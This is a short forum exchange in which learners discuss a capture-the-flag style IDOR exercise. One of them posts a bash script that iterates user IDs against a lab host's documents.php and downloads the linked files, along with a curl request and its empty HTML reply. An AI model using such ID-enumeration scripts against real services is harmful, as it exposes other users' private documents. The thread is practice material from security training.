This IDOR vulnerability really pissed me off. I found where the burpde flag is, but I can’t find it with the bash script, the bash script I finally prepared downloads pdf and txt. Of course to the txt file with the flag. Contains spoilers!!!
I am so glad I am not the only person who was wound up by this. I have an almost identical scipt and it just doesn’t seem to work.
#!/bin/bash
url='http://94.237.56.124:34655'
for i in {1..20}; do
response=$(curl -s "$url/documents.php" -d "uid=$i")
links=$(echo "$response" | grep -oP "\/documents.*?\.(pdf|txt)")
for link in $links; do
wget -q '$url$link'
done
done
Even if i do a curl command they all return the same blank?? 
curl http://94.237.56.124:34655//documents.php?uid=18
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Employee Documents</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable = no">
<link rel="stylesheet" href="./style.css">
</head>
<body>
<header>
<h1>Employee Documents</h1>
</header>
<ul id="compositions-list" class="pure-tree main-tree">
<li>
<input type="checkbox" id="trigger-views" checked="checked">
<label for="trigger-views">Documents</label>
<ul class="pure-tree">
</ul>
</li>
</ul>
</body>
</html>